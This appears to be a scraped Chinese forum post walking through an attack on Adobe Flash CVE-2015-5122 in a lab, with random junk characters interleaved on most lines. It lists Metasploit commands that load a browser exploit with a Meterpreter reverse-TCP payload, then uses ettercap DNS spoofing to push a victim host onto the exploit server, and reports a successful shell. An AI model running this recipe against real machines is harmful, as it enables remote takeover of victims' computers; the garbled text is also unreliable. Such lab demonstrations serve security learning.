|
+ N/ `) D. V1 U# r9 {) W0 B 二、cve2015-5122漏洞实例演示虚拟机
0 i' }+ z- U, w- ~# v , w1 t% i# ]3 D* Y
! x- g. W& |* r( L' l! n- Y! {* R
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
6 \& J7 n- @9 E" b7 q) D
9 F. p7 p! g" n2 C d: x# M; Q0 c: Y( M) y1 M3 M
search cve-2015-5122如图: ; Z- N# G' @- p( g& ` c& [2 a
! N- a7 {# A5 y5 |# i3 \4 V* Y! i* s& n' k" G1 H
( G. o7 j! A# _" Y) x, l% G 2 Z3 j2 O( o$ `, ]9 Q. J8 Y0 _+ G! a
. Y" X$ P1 y& w3 ^& h% B 下面我们敲如下命令: 3 q4 q+ h2 ~* m: W' p( s
5 P5 e: F# _6 f! ]* b- R
) U2 M* F% Q2 I! \; F+ Y, [/ p% @
use exploit/multi/browser/adobe_flash_opaque_background_uaf
) E6 ^+ r4 j, @& P! G! z8 I
& Q$ I$ k$ i" Z# l5 G
6 ]& y& R. t0 `9 `( @* x+ Z/ W& L set PAYLOAD windows/meterpreter/reverse_tcp
( R. P" I: U$ y3 h $ v& [$ d9 ^ D; x
* N; Q U2 x" p3 ~- t set LHOST 192.168.0.109 / }& K+ Z: E2 {
/ P p* G/ D2 ?/ s% [5 T8 z( E" T! C
set URIPATH / /*根目录*/ & J2 w7 e7 \/ T+ O0 o6 F0 n
* {7 a3 A7 |7 }/ [( k% R
- {, r5 G+ G3 S3 q5 b) N8 T set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 V3 Z! A9 E( L# h( W0 j. M. g
4 e" G) N0 n* y+ v# S `1 y. C/ P) n6 ^" Z4 E/ A) X2 L
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
) ^* z2 S: a7 V1 o2 x M. X" C0 V9 G( i4 a" `- P! u! h
2 o; o) z g- Z0 P 然后show options如图:
/ j/ D' K; l1 G) P. [' b2 I
' {, \. a1 K( }1 Q6 I3 [
/ j" v- g. N$ B$ d# N% I# t/ t/ Z 7 ?6 @6 j+ Q' ^0 ^
- m: J) r8 n8 T$ f) G8 d+ Y
0 E; @+ U f( k. g
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: / _* T2 B# r K
N+ x5 d, I( y+ D4 N
5 n* b; a- w4 o, l/ @7 ^& }, r0 D; Y; ]1 P5 d
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
9 f* r2 a, r" G( e2 o 3 D0 \1 U e: W5 o( H+ R3 G
" ]& E. N: `1 G9 y$ A Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ) g! a/ [5 P3 E5 F7 A, I2 a% X! c3 O
9 v" v6 J. k/ A* f
& d, d, V+ `* a( `7 X# B# b 4 n9 ]/ g0 g2 U* H. z
% {. K# \5 V$ R. _1 H5 }+ F) A7 c0 G
成功了,这时候我们断开ettercap,如图:
1 S2 ^. A; t7 N; p' L/ \ ' c8 u5 \7 _' `2 z1 M- J3 X
: l7 a& \8 N% t
: D3 j8 Y* {$ d; t
4 u F1 q; l$ D6 S; Q6 I& F
( Q1 P# H: g& a9 }& C2 ^* P
Screenshot如图: 0 ?- p0 j) J+ X1 {( x* V6 S
$ |3 j9 X) j: k# @% J
4 N; g; f( [; ?$ c7 G0 z/ q* Z
r A0 i8 O6 U# {7 r5 l
5 f |" n( u, }8 T8 Z8 ?' K: N r+ [4 g9 Z1 F
, L% G% i1 d/ U7 i
|